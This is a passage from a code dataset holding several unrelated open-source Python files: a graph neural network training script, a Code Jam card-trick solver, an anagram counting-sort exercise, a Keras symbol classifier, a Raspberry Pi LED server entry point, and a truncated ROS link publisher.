SAGEConv\nfrom torch_geometric.utils import negative_sampling\nfrom torch_cluster import random_walk\nfrom torch_geometric.utils.convert import from_networkx\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score\nfrom sklearn.preprocessing import StandardScaler\nfrom torch_geometric.utils import remove_isolated_nodes\nfrom pingumil.models import load_model\nfrom pingumil.util.pytorchtools import EarlyStopping\nfrom pingumil.experiments.gpp.gpp_exp import GPPBaseExperiment, EPS\nimport wandb\nimport time\n\n#wandb stuff\nrun = wandb.init(project=\"fsp\", group=\"gpp_tsp\",\n config={\n \"batch_size\" : 512,\n \"lr\": 1e-3,\n \"lr_clf\": 1e-5,\n \"weight_decay\": 1e-5,\n \"gnn\": \"hgt\"\n })\n\nexperiment = GPPBaseExperiment(experiment_tag=\"semisup_tsp\",\n epochs=1000, \n mlc_epochs=200,\n timestamp=time.time(),\n model_config=\"configs/gpp_hgtmodel.json\",\n patience=10,\n wandb=wandb,\n override_data=False)\n\nprint(experiment.output_file)\n#Read all necessary data\ndataset = experiment.read_data()\n\ngraph_ids = list(dataset.keys())\n'''# supergraph feature/attribute set\natbs_list = []\natbsets_dict = {}\nall_dim_types = []\n\n#Get supergraph feature/attribute set\nfor graph_id, graph_data in dataset.items():\n for atbsets_list in graph_data[\"atbset_list\"]:\n #Get list of all attributes in any type of node\n atbs_list = atbs_list+atbsets_list\n atbs_list = sorted(list(set(atbs_list)))\n\n# Sort feature sets of all graphs that belong to the dataset (FSE)\nfor graph_id, graph_data in dataset.items():\n atbsets_list = graph_data[\"atbset_list\"]\n atbs_maps = {atb : {} for atb in atbs_list}\n f = lambda l,v: l.index(v) if v in l else -1\n for atb in atbs_maps.keys():\n atbs_maps[atb] = {k:f(v,atb) for k,v in enumerate(atbsets_list)}\n node_feats = graph_data[\"node_feats\"]\n node_typencs = []\n for i,_ in enumerate(node_feats):\n new_node_feats = torch.zeros((node_feats[i].shape[0],len(atbs_list)))\n new_node_typencs = torch.zeros((node_feats[i].shape[0],len(atbs_list)))\n #type_encoding = []\n for atb, atb_dict in atbs_maps.items():\n atb_final_index = atbs_list.index(atb)\n #if atb_dict[i] == -1:\n #type_encoding.append(0)\n #else:\n if atb_dict[i] != -1:\n #type_encoding.append(1)\n new_node_feats[:,atb_final_index] = node_feats[i][:, atb_dict[i]]\n new_node_typencs[:,atb_final_index] = torch.ones(node_feats[i].shape[0])\n #print(type_encoding)\n node_feats[i] = new_node_feats\n node_typencs.append(new_node_typencs)\n dataset[graph_id][\"node_feats\"] = torch.cat(node_feats)\n dataset[graph_id][\"node_typencs\"] = torch.cat(node_typencs)\n'''\n# supergraph feature/attribute set\natbs_list = []\natbsets_dict = {}\nall_dim_types = []\n\n#Get supergraph feature/attribute set, create a dictionary from attribute set to a identifier,\n# and add the attribute set identifier in a adjacent graph_data[\"node_types\"] structure\nfor graph_id, graph_data in dataset.items():\n for i, atbsets_list in enumerate(graph_data[\"atbset_list\"]):\n #Get list of all attributes in any type of node\n atbs_list = atbs_list+atbsets_list\n atbs_list = sorted(list(set(atbs_list)))\n if tuple(atbsets_list) not in atbsets_dict:\n atbsets_dict[tuple(atbsets_list)] = len(atbsets_dict)\n assert graph_data[\"node_feats\"][i].size()[1] == len(atbsets_list)\n all_dim_types.append(len(atbsets_list))\n current_node_type = atbsets_dict[tuple(atbsets_list)]\n if \"node_types\" not in dataset[graph_id]:\n dataset[graph_id][\"node_types\"] = []\n if current_node_type not in dataset[graph_id][\"node_types\"]:\n dataset[graph_id][\"node_types\"].append(current_node_type)\n\n'''#Standardize data from all graphs\nexperiment.log(f\"Standardization: {experiment.standardization}\\n\")\nif experiment.standardization:\n dataset = experiment.standardize_all(dataset)'''\n\n#Standardize data from all graphs\nexperiment.log(f\"Standardization: {experiment.standardization}\\n\")\nif experiment.standardization:\n scalers = {}\n # Fit an scaler for each feature/attribute\n for graph_id, graph_data in dataset.items():\n atbsets_list = graph_data[\"atbset_list\"]\n atbs_maps = {atb : {} for atb in atbs_list}\n f = lambda l,v: l.index(v) if v in l else -1\n for atb in atbs_maps.keys():\n atbs_maps[atb] = {k:f(v,atb) for k,v in enumerate(atbsets_list)}\n node_feats = graph_data[\"node_feats\"]\n #For each attribute, apply normalization on node_feats according to the mapping\n for atb, atb_map in atbs_maps.items():\n if atb not in scalers:\n scalers[atb] = StandardScaler()\n node2tuple = tuple([node_feats[k][:,v] for k,v in atb_map.items() if v != -1])\n if len(node2tuple) == 0:\n continue\n atbdata = torch.cat(node2tuple)\n #print(atbdata)\n if ((torch.min(atbdata).item() == 0 and torch.max(atbdata).item() == 1) or torch.equal(atbdata, torch.zeros_like(atbdata))\n or torch.equal(atbdata, torch.ones_like(atbdata))):\n #print(f\"Continuning for {atb}, possible One-Hot-Encoded\")\n continue\n atbdata_t = atbdata.reshape(-1,1)\n scalers[atb] = scalers[atb].partial_fit(atbdata_t)\n \n #Now transform data from all graphs\n for graph_id, graph_data in dataset.items():\n atbsets_list = graph_data[\"atbset_list\"]\n atbs_maps = {atb : {} for atb in atbs_list}\n f = lambda l,v: l.index(v) if v in l else -1\n for atb in atbs_maps.keys():\n atbs_maps[atb] = {k:f(v,atb) for k,v in enumerate(atbsets_list)}\n node_feats = graph_data[\"node_feats\"]\n #For each attribute, apply normalization on node_feats according to the mapping\n for atb, atb_map in atbs_maps.items():\n if atb not in scalers:\n scalers[atb] = StandardScaler()\n node2tuple = tuple([node_feats[k][:,v] for k,v in atb_map.items() if v != -1])\n if len(node2tuple) == 0:\n continue\n atbdata = torch.cat(node2tuple)\n #print(atbdata)\n if ((torch.min(atbdata).item() == 0 and torch.max(atbdata).item() == 1) or torch.equal(atbdata, torch.zeros_like(atbdata))\n or torch.equal(atbdata, torch.ones_like(atbdata))):\n #print(f\"Continuning for {atb}, possible One-Hot-Encoded\")\n continue\n split_dim = [node_feats[k][:,v].shape[0] for k,v in atb_map.items() if v!=-1]\n atbdata_t = atbdata.reshape(-1,1)\n atbdata_std = torch.from_numpy(scalers[atb].fit_transform(atbdata_t).reshape(1,-1))\n split_atbdata_std = torch.split(atbdata_std[0], split_dim)\n i = 0\n for k,v in atb_map.items():\n if v == -1:\n continue\n node_feats[k][:,v] = split_atbdata_std[i]\n i = i + 1\n dataset[graph_id][\"node_feats\"] = node_feats\n\n#Configuration\nnum_samples = [-1,-1]\nwalk_length = 1\nbatch_size = wandb.config.batch_size\nmha_batch_size = 256\nnum_neg_samples = 1\nepochs = experiment.epochs\ngnn_input_dim = 128\n\ndef find_nodemap(fnid, node_maps):\n offset = 0\n for i,v in enumerate(node_maps):\n if fnid < offset + len(v):\n return i\n offset += len(v)\n\nall_node_types=[]\n# #update edge_index according to node_maps\nfor graph_id, graph_data in dataset.items():\n dict_x2m = {}\n node_maps = graph_data[\"node_maps\"]\n data = graph_data[\"graph\"]\n node_feats = graph_data[\"node_feats\"]\n node_types = graph_data[\"node_types\"]\n #update edge_index according to node_maps\n for node_map in node_maps:\n offset = len(dict_x2m)\n dict_x2m.update({k+offset:v for k,v in enumerate(node_map)})\n data.edge_index[0] = torch.LongTensor([dict_x2m[idx] for idx in data.edge_index[0].tolist()])\n data.edge_index[1] = torch.LongTensor([dict_x2m[idx] for idx in data.edge_index[1].tolist()])\n data.x_ts = node_feats\n data.t_ts = node_types\n \n num_nodes = sum([x.size(0) for x in node_feats])\n node_types = [find_nodemap(x, node_maps) for x in range(num_nodes)]\n data.node_types = torch.Tensor(node_types)\n all_node_types = list(set(all_node_types + node_types))\n data.class_map = graph_data[\"class_map\"]\n graph_data[\"graph\"] = data\n dataset[graph_id][\"dict_x2m\"] = dict_x2m\n\nedge_type_dict = {}\nnum_edge_types = 0\nfor i in range(len(all_node_types)):\n edge_type_dict[i] = {}\n for j in range(i,len(all_node_types)):\n edge_type_dict[i][j] = num_edge_types\n num_edge_types += 1\n\ndef get_edge_type_index(fnids):\n #print(fnids)\n node_label_ids = fnids\n node_label_ids.sort()\n i, j = node_label_ids[0], node_label_ids[1]\n return edge_type_dict[i][j]\n\n'''subgraph_loader = NeighborSampler(\n data.edge_index, node_idx=None,\n sizes=[-1], batch_size=batch_size, shuffle=False,\n num_workers=0)'''\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\ngnn_config = json.load(open(experiment.model_config))[0]\ngnn_config[\"in_dim\"] = 128\ngnn_config[\"num_types\"] = 1\ngnn_config[\"num_relations\"] = num_edge_types\ngnn_model = load_model(gnn_config)\nprint(gnn_model)\ngnn_model = gnn_model.to(device)\n\ntypeproj_config = {\n \"model\": \"typeprojection\",\n \"dim_types\": all_dim_types,\n \"dim_output\": gnn_config[\"in_dim\"]\n}\ntypeproj_model = load_model(typeproj_config)\ntypeproj_model = typeproj_model.to(device)\n\ntypeproj_optimizer = torch.optim.Adam(typeproj_model.parameters(),\n lr=wandb.config.lr)\ngnn_optimizer = torch.optim.Adam(gnn_model.parameters(),\n lr=wandb.config.lr,\n weight_decay=wandb.config.weight_decay)\n#x = data.x.to(device)\n\n#data_list = [graph_data[\"graph\"] for graph_id, graph_data in dataset.items()]\n#loader = DataLoader(data_list, batch_size=batch_size)\n\n#torch.autograd.set_detect_anomaly(True)\nexperiment.log(f\"Device: {device}, visible devices: {os.environ['CUDA_VISIBLE_DEVICES']}\\n\")\nexperiment.log(f\"Type Projection: {typeproj_model}\\n\")\nexperiment.log(f\"Graph Representation Learning Model: {gnn_model}\\n\")\n\ndef train(epoch):\n graph_loss = 0\n i = 1\n for _, graph_data in dataset.items():\n data = graph_data[\"graph\"]\n if data.edge_index.size()[-1] < batch_size:\n continue\n x_ts = [x_t.to(device) for x_t in data.x_ts]\n node_types = data.node_types.to(device)\n \n gnn_model.train()\n typeproj_model.train()\n\n pbar = tqdm(total=data.num_nodes)\n pbar.set_description(f'Epoch {epoch:02d}')\n\n #Type Projection Step\n #print(x)\n x_p = typeproj_model(x_ts, data.t_ts)\n #print(x_p)\n #print(x[0])\n total_loss = 0\n \n edges_as_list = zip(data.edge_index[0].tolist(),\n data.edge_index[1].tolist())\n\n pos_edge_types = torch.Tensor(\n [get_edge_type_index([int(node_types[i]),int(node_types[j])]) for i,j in edges_as_list])\n pos_edge_types = pos_edge_types.to(device)\n \n pos_train_edge_loader = DataLoader(torch.arange(data.edge_index.size()[-1]),\n batch_size=wandb.config.batch_size, shuffle=True)\n\n\n train_neg_edge_index = negative_sampling(\n edge_index=data.edge_index,\n num_nodes = data.num_nodes\n )\n \n #train_edges = torch.cat([data.train_pos_edge_index, train_neg_edge_index], dim=-1).to(device)\n neg_edges_as_list = zip(train_neg_edge_index[0].tolist(),\n train_neg_edge_index[1].tolist())\n \n neg_edge_types = torch.Tensor(\n [get_edge_type_index([int(node_types[i]),int(node_types[j])]) for i,j in neg_edges_as_list])\n neg_edge_types = neg_edge_types.to(device)\n neg_train_edge_loader = DataLoader(torch.arange(train_neg_edge_index.size()[-1]),\n batch_size=wandb.config.batch_size, shuffle=True)\n zero_node_types = torch.zeros_like(torch.Tensor(node_types)).to(device)\n\n typeproj_optimizer.zero_grad()\n\n for pos_batch_edge_idx, neg_batch_edge_idx in zip(pos_train_edge_loader, neg_train_edge_loader):\n train_edge_time = torch.Tensor([0]*data.edge_index.size(-1))\n train_edge_time = train_edge_time.to(device)\n \n z_pos = gnn_model(x_p, zero_node_types, train_edge_time,\n data.edge_index[:,pos_batch_edge_idx].to(device),\n pos_edge_types[pos_batch_edge_idx]\n )\n \n node_i, node_j = data.edge_index[:,pos_batch_edge_idx][0], data.edge_index[:,pos_batch_edge_idx][1]\n #print(node_i.size())\n #print(node_j.size())\n out = (z_pos[node_i] * z_pos[node_j]).sum(dim=-1).view(-1)\n pos_loss = -torch.log(torch.sigmoid(out) + EPS).mean()\n \n z_neg = gnn_model(x_p, node_types, train_edge_time,\n train_neg_edge_index[:,neg_batch_edge_idx].to(device),\n neg_edge_types[neg_batch_edge_idx].to(device))\n node_i, node_j = train_neg_edge_index[:,neg_batch_edge_idx][0], train_neg_edge_index[:,neg_batch_edge_idx][1]\n #print(node_i.size())\n #print(node_j.size())\n out = (z_neg[node_i] * z_neg[node_j]).sum(dim=-1).view(-1)\n neg_loss = -torch.log(1 - torch.sigmoid(out) + EPS).mean()\n #print(node_i.size())\n #print(node_j.size())\n out = (z_neg[node_i] * z_neg[node_j]).sum(dim=-1).view(-1)\n neg_loss = -torch.log(1 - torch.sigmoid(out) + EPS).mean()\n gnn_optimizer.zero_grad()\n loss = pos_loss + neg_loss\n loss.backward(retain_graph=True)\n gnn_optimizer.step()\n\n wandb.log({\"emb batch loss\":loss.item()})\n total_loss += loss.item()\n pbar.update(len(pos_batch_edge_idx)/2)\n typeproj_optimizer.step()\n pbar.close()\n\n loss = total_loss / len(pos_train_edge_loader)\n wandb.log({\"emb loss\":loss})\n\n graph_loss = graph_loss + loss\n i = i+1\n return graph_loss/i\n\ngnn_early_stopping = experiment.get_early_stopping(verbose=True,\n prefix=\"embed\")\nproj_early_stopping = experiment.get_early_stopping(verbose=True,\n prefix=f\"proj\")\nbest_loss = np.inf\nfor epoch in range(1, experiment.epochs):\n loss = train(epoch)\n wandb.log({\"train loss\":loss})\n if loss < best_loss:\n best_loss = loss\n gnn_early_stopping(loss, gnn_model)\n proj_early_stopping(loss, typeproj_model)\n print(f'Epoch {epoch:02d}, Loss: {loss:.4f}')\n if gnn_early_stopping.early_stop:\n print(\"Early Stopping!\")\n break\nprint(f'Best Loss: {best_loss:.4f}')\nexperiment.log(f'Epoch: {epoch} -> Loss (Representation Learning): {best_loss:.4f}')\n\ntypeproj_model.load_state_dict(torch.load(proj_early_stopping.path))\ngnn_model.load_state_dict(torch.load(gnn_early_stopping.path))\n\nx_multi = []\ny_multi = []\nfor graph_id, graph_entry in dataset.items():\n graph_data = graph_entry[\"graph\"]\n if None in graph_data.class_map.values():\n continue\n data = graph_data.to(device)\n node_types = data.node_types.to(device)\n x_p = typeproj_model(data.x_ts, data.t_ts)\n train_pos_edge_index = data.edge_index.to(device)\n edges_as_list = zip(data.edge_index[0].tolist(),\n data.edge_index[1].tolist())\n pos_edge_types = torch.Tensor(\n [get_edge_type_index([int(node_types[i]), int(node_types[j])]) for i,j in edges_as_list])\n pos_edge_types = pos_edge_types.to(device)\n zero_node_types = torch.zeros_like(torch.Tensor(node_types)).to(device)\n train_edge_time = torch.Tensor([0]*data.edge_index.size(-1))\n train_edge_time = train_edge_time.to(device)\n print(x_p.size(), zero_node_types.size(),\n train_edge_time.size(),\n train_pos_edge_index.size(),\n pos_edge_types.size())\n z = gnn_model(x_p, zero_node_types, train_edge_time, train_pos_edge_index, pos_edge_types).detach()\n z = z.to(device)\n graph_dx2m = graph_entry[\"dict_x2m\"]\n x_multi = x_multi + [z[graph_dx2m[int(x)]] for x in graph_data.class_map.keys()]\n y_multi = y_multi + [torch.Tensor(list(graph_data.class_map.values()))[0]]\n\nx_multi = torch.stack(x_multi)\nprint(x_multi.size())\ny_multi = torch.stack(y_multi)\nprint(y_multi.size())\n\nassert x_multi.size(0) == y_multi.size(0)\n\ny_bartle = y_multi[:,:4]\ny_dedica = y_multi[:,4:]\n\nassert y_bartle.size(1) == 4\nassert y_dedica.size(1) == 2\n\nfor label, y_gt in [(\"bartle\", y_bartle), (\"dedication\", y_dedica)]:\n multilabel_config = json.load(open(experiment.model_config))[1]\n multilabel_config[\"in_channels\"] = x_multi.size(1)\n multilabel_config[\"out_channels\"] = y_gt.size(1)\n multilabel_model = load_model(multilabel_config).to(device)\n\n experiment.log(f\"Multilabel Classification Model: {multilabel_model}_{label}\\n\")\n\n experiment.multilabel_classification_step(device, multilabel_model,\n x_multi, y_gt, list(dataset.keys()),\n wandb, suffix=label)\n\nexperiment.get_quality_results()","repo_name":"sidneyaraujomelo/PingUMiL","sub_path":"pingumil/experiments/gpp/gpp_unsup_hgt_tsp.py","file_name":"gpp_unsup_hgt_tsp.py","file_ext":"py","file_size_in_byte":18265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23409718581","text":"#!/usr/bin/python\n\nimport sys\n\ndef extractQuiz(lines):\n\tanswer1=int(lines[0].strip())\n\tanswer2=int(lines[5].strip())\n\tarrange1=[]\n\tarrange2=[]\n\tfor i in range(1,5):\n\t\tarrange1.append(lines[i].split())\n\t\tarrange2.append(lines[i+5].split())\n\treturn (answer1,arrange1,answer2,arrange2)\n\ndef readFile(dir):\n\tf=open(dir)\n\tlines=f.readlines()\n\tT=int(lines[0].strip())\n\trt=[]\n\tfor i in range(T):\n\t\t#print lines[1+i*10:11+i*10]\n\t\trt.append(extractQuiz(lines[1+i*10:11+i*10]))\n\treturn rt\n\ndef sovleQuiz(quiz):\n\trow1=set(quiz[1][quiz[0]-1])\n\trow2=set(quiz[3][quiz[2]-1])\n\tcard=row1.intersection(row2)\n\t#print quiz[1],quiz[0]\n\tif len(card)==1:\n\t\treturn list(card)[0]\n\telif len(card)>1:\n\t\treturn \"Bad magician!\"\n\telse:\n\t\treturn \"Volunteer cheated!\"\n\nif __name__==\"__main__\":\n\tquizs=readFile(sys.argv[1])\n\tfor i in range(len(quizs)):\n\t\tprint(\"Case #%s: %s\"%(i+1,sovleQuiz(quizs[i])))\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/1083.py","file_name":"1083.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70489389956","text":"from kol1btesty import runtests\n\ndef split(word):\n n = len(word)\n A = [0 for _ in range(26)]\n for i in range(n):\n A[ord(word[i]) - ord('a')] += 1\n return A\n\ndef counting_sort(A, k, index):\n n = len(A)\n C = [0 for _ in range(k)]\n B = [0 for _ in range(n)]\n for x in A:\n C[x[index]] += 1\n for i in range(1, k):\n C[i] = C[i] + C[i - 1]\n for i in range(n - 1, -1, -1):\n B[C[A[i][index]] - 1] = A[i]\n C[A[i][index]] -= 1\n for i in range(n):\n A[i] = B[i]\n return A\n\ndef f(T):\n n = len(T)\n maks = 0\n for i in range(n):\n T[i] = split(T[i])\n for ind in range(25, -1, -1):\n maks_int = 0\n for i in range(n):\n maks_int = max(maks_int, max(T[i]))\n counting_sort(T, maks_int+1, ind)\n cnt = 1\n for i in range(1, n):\n if T[i-1] == T[i]:\n cnt += 1\n else:\n maks = max(maks, cnt)\n cnt = 1\n return max(maks, cnt)\n\n\nfrom typing import List\n\n\"\"\"\nFind anagrams. Alorthim starta from changing words to arrays with counter of type of letter. \nThis arrays are sorted by radix && counting sort by all 26 letter. Than loop looks for most common word in this sorted \narrays.\n\"\"\"\n\n\ndef countingsort(A: List[List[int]], k: int, index: int) -> None: # stabliny count po kazdym indexie\n n = len(A)\n C = [0 for _ in range(k)]\n B = [0 for _ in range(n)]\n\n for i in range(n):\n C[A[i][index]] += 1\n\n for i in range(1, k):\n C[i] = C[i] + C[i - 1]\n\n for i in range(n - 1, -1, -1):\n B[C[A[i][index]] - 1] = A[i]\n C[A[i][index]] -= 1\n\n for i in range(n):\n A[i] = B[i]\n\n\ndef f2(T: List[str]) -> int:\n n = len(T)\n A = [[0 for _ in range(26)] for _ in range(n)]\n\n for i in range(n):\n for s in T[i]:\n A[i][ord(s) - 97] += 1\n\n for i in range(26):\n k = 0\n for j in range(n):\n k = max(A[j][i], k) # finding k for counting sort\n\n k += 1\n countingsort(A, k, i)\n for x in A:\n print(x)\n print('[[[[[[[[[[[[[[[[')\n for x in A:\n print(x)\n ans = count = 1\n check = A[0]\n for i in range(1, n):\n if A[i] == check:\n count += 1\n else:\n ans = max(ans, count)\n count = 1\n check = A[i]\n\n ans = max(ans, count) # checking last element cuz it never goes to else in loop\n return ans\n\n\n# if __name__ == '__main__':\n# tab =['tygrys', 'kot', 'wilk', 'trysyg', 'wlik', 'sygryt', 'likw', 'tygrys']\n# print(f(tab))\n\n\n# Zamien all_tests=False na all_tests=True zeby uruchomic wszystkie testy\nruntests( f, all_tests=True )\n","repo_name":"Deevo87/asd-algorithms","sub_path":"sorting/exercise_from_exams_sorting/kolosy/kolos_21_22/zad1/kol1b.py","file_name":"kol1b.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38025263301","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n\nimport os\nimport cv2\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Dense, Flatten, Dropout\nfrom tensorflow.keras import utils\nfrom tensorflow.keras.preprocessing import image\nfrom tensorflow.keras.preprocessing import image_dataset_from_directory\nfrom tensorflow.keras.models import load_model\nfrom keras.layers import Dense, Conv2D, MaxPool2D , Flatten\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay\nimport pandas as pd\n\n\nbatch_size=30\nimage_size=(128, 128)\n\ne = int(input(\"\\nВведите количество эпох для обучения нейросети: \"))\n\ntrain_dataset = image_dataset_from_directory('./traning_set',\n subset='training',\n seed=42,\n validation_split=0.1,\n batch_size=batch_size,\n image_size=image_size,\n color_mode=\"grayscale\")\n\nvalidation_dataset = image_dataset_from_directory('./traning_set',\n subset='validation',\n seed=42,\n validation_split=0.1,\n batch_size=batch_size,\n image_size=image_size,\n color_mode=\"grayscale\")\n\n\nclass_names = train_dataset.class_names\n\nimport csv \n\nwith open(\"class_names.csv\", \"w\", newline='') as file:\n csv.writer(file).writerow(class_names)\n\ntest_dataset = image_dataset_from_directory('./test_set',\n seed=42, \n batch_size=batch_size,\n image_size=image_size,\n color_mode=\"grayscale\")\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\n\ntrain_dataset = train_dataset.prefetch(buffer_size=AUTOTUNE)\nvalidation_dataset = validation_dataset.prefetch(buffer_size=AUTOTUNE)\ntest_dataset = test_dataset.prefetch(buffer_size=AUTOTUNE)\n\n# Создаем последовательную модель\nmodel_f7_5_3_drop = Sequential()\n# Сверточный слой\nmodel_f7_5_3_drop.add(Conv2D(16, (7, 7), padding='same', \n input_shape=(128, 128, 1), activation='relu'))\n# Слой подвыборки\nmodel_f7_5_3_drop.add(MaxPooling2D(pool_size=(2, 2)))\n# Сверточный слой\nmodel_f7_5_3_drop.add(Conv2D(32, (5, 5), padding='same', \n input_shape=(128, 128, 1), activation='relu'))\n# Слой подвыборки\nmodel_f7_5_3_drop.add(MaxPooling2D(pool_size=(2, 2)))\n# Сверточный слой\nmodel_f7_5_3_drop.add(Conv2D(64, (3, 3), padding='same', \n input_shape=(128, 128, 1), activation='relu'))\n# Слой подвыборки\nmodel_f7_5_3_drop.add(MaxPooling2D(pool_size=(2, 2)))\n# Полносвязная часть нейронной сети для классификации\nmodel_f7_5_3_drop.add(Flatten())\nmodel_f7_5_3_drop.add(Dense(512, activation='relu'))\nmodel_f7_5_3_drop.add(Dropout(0.1))\n# Выходной слой, 208 нейронов по количеству классов\nmodel_f7_5_3_drop.add(Dense(208, activation='softmax'))\nmodel_f7_5_3_drop.summary()\n\nmodel_f7_5_3_drop.compile(loss='sparse_categorical_crossentropy',\n optimizer=\"adam\",\n metrics=['accuracy'])\n\nhistory = model_f7_5_3_drop.fit(train_dataset, \n validation_data=validation_dataset,\n epochs=e,\n verbose=2)\n\nmodel_f7_5_3_drop.save(\"Symbol_Check_model_f7_5_3_drop.h5\")\n\nscores = model_f7_5_3_drop.evaluate(test_dataset, verbose=1)\n\nprint(\"\\nНейросеть сохранена в файл: Symbol_Check_model_f7_5_3_drop.h5\")\n","repo_name":"OlegMyagkov/GraduationWork","sub_path":"Check_Sym_Pic/Classificator_V_1_0_0.py","file_name":"Classificator_V_1_0_0.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11955141687","text":"import argparse\nimport logging\nimport os\nimport signal\nimport sys\nfrom logging import handlers\n\nfrom server.configmanager import ConfigurationManager\nfrom server.crossbarintegration.crossbarmanager import CrossbarManager\nfrom server.ledmanager import LEDManager\nfrom server.ledserver import LEDServer\n\ncrossbarManager = None\nledServer = None\n\n\ndef initLogger(loggerName, logPath, fileLogLevel, consoleLogLevel):\n logger = logging.getLogger(loggerName)\n loggerLevel = min(fileLogLevel, consoleLogLevel)\n logger.setLevel(loggerLevel)\n logFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\n fileHandler = handlers.TimedRotatingFileHandler(logPath, when='D', backupCount=7)\n fileHandler.setFormatter(logFormatter)\n fileHandler.setLevel(fileLogLevel)\n logger.addHandler(fileHandler)\n\n consoleHandler = logging.StreamHandler()\n consoleHandler.setFormatter(logFormatter)\n consoleHandler.setLevel(consoleLogLevel)\n logger.addHandler(consoleHandler)\n\n\ndef initLogging(logPath, fileLogLevel, consoleLogLevel, accessLogToConsole):\n initLogger(\"main\", logPath + \"/piledcontrol.log\", fileLogLevel, consoleLogLevel)\n if accessLogToConsole:\n consoleLogLevel = consoleLogLevel\n else:\n consoleLogLevel = logging.CRITICAL\n initLogger(\"access\", logPath + \"/piledcontrol_access.log\", fileLogLevel, consoleLogLevel)\n logging.getLogger().setLevel(100)\n\n\ndef getArguments():\n parser = argparse.ArgumentParser(description='This is the server of pi-led-control')\n parser.add_argument('-n', '--name', help='the hostname on which pi-led-control is served', default='')\n parser.add_argument('-p', '--port', help='the port on which pi-led-control is served', type=int, default=9000)\n parser.add_argument('-c', '--configPath', help='the path to the config file to be used',\n default=\"../pi-led-control.config\")\n logLevelsRange = [logging.NOTSET, logging.DEBUG, logging.INFO, logging.WARN, logging.ERROR, logging.CRITICAL]\n parser.add_argument('-l', '--logPath', help='the path to the log folder to be used',\n default=os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n parser.add_argument('-fl', '--fileLogLevel', help='the log level for the logfile', type=int, choices=logLevelsRange,\n default=logging.INFO)\n parser.add_argument('-cl', '--consoleLogLevel', help='the log level for the console', type=int,\n choices=logLevelsRange, default=logging.ERROR)\n parser.add_argument('-atc', '--accessLogToConsole', help='set to True to print access log entries to console',\n type=bool, default=False)\n return vars(parser.parse_args())\n\n\ndef startCrossbar(crossbarConfigPath):\n global crossbarManager\n try:\n crossbarManager = CrossbarManager(crossbarConfigPath)\n crossbarManager.start()\n logging.info(\"crossbar started with config \" + crossbarConfigPath)\n except Exception as e:\n logging.warning(\"failed to start crossbar \" + str(e))\n\n\ndef startServer(hostName, port, configPath):\n global ledServer\n try:\n ledServer = LEDServer((hostName, port), LEDManager(), ConfigurationManager(configPath))\n except OSError as e:\n if str(e) == \"[Errno 98] Address already in use\":\n logging.getLogger(\"main\").critical(\"can't init server, port is already in use\")\n else:\n raise e\n else:\n try:\n ledServer.serve_forever()\n except KeyboardInterrupt:\n cleanUpAndExit(None, None)\n\n\ndef cleanUpAndExit(signal_type, frame):\n global ledServer\n global crossbarManager\n print('Cancelled!')\n crossbarManager.stop()\n ledServer.server_close()\n sys.exit(0)\n\n\ndef main():\n args = getArguments()\n\n initLogging(args['logPath'], args['fileLogLevel'], args['consoleLogLevel'], args['accessLogToConsole'])\n\n signal.signal(signal.SIGINT, cleanUpAndExit)\n startCrossbar(os.path.dirname(os.path.realpath(__file__)) + \"/server/crossbarintegration/crossbar_config\")\n startServer(args['name'], args['port'], args['configPath'])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"s0riak/pi-led-control","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"11705746351","text":"#!/usr/bin/env python3\nimport rospy, roslib, tf\n\nfrom PyKDL import *\nfrom math import pi\nfrom geometry_msgs.msg import Pose, PoseArray\n\ndef publish_link():\n\t\"\"\"\n\tReceive tf data(it suggests position of link frame relative to previous link frame) from indy7 robot,\n\tand publish data of these points as PoseArray.\n\t\"\"\"\n\trospy.init_node('link_publisher')\n\tpub = rospy.Publisher('link', PoseArray, queue_size=1)\n\trate = rospy.Rate(10)\n\tlistener = tf.TransformListener()\n\ttrans = [0 for j in range(8)]\n\trot = [0 for k in range(8)]\n\n\twhile not rospy.is_shutdown():\n\n\t\tpose_linklist = PoseArray()\n\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\t(trans[0], rot[0]) = listener.lookupTransform('/world', '/link0', rospy.Time(0))\n\t\t\t\t(trans[1], rot[1]) = listener.lookupTransform('/link0', '/link1', rospy.Time(0))\n\t\t\t\t(trans[2], rot[2]) = listener.lookupTransform('/link1', '/link2', rospy.Time(0))\n\t\t\t\t(trans[3], rot[3]) = listener.lookupTransform('/link2', '/link3', rospy.Time(0))\n\t\t\t\t(trans[4], rot[4]) = listener.lookupTransform('/link3', '/link4', rospy.Time(0))\n\t\t\t\t(trans[5], rot[5]) = listener.lookupTransform('/link4', '/link5', rospy.Time(0))\n\t\t\t\t(trans[6], rot[6]) = listener.lookupTransform('/link5', '/link6', rospy.Time(0))\n\t\t\t\t(trans[7], rot[7]) = listener.lookupTransform('/link6', '/tcp', rospy.Time(0))\n\t\t\t\tbreak\n\t\t\texcept (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n\t\t\t\tcontinue\n\n\t\tfor i in range(8):\n\t\t\tpose_link = Pose()\n\n\t\t\tif i == 0 :\n\t\t\t\tpose_link.position.x = trans[i][0] + 0.5\n\t\t\telse :\n\t\t\t\tpose_link.position.x = trans[i][0]\n\t\t\t\t\n\t\t\tpose_link.position.y = 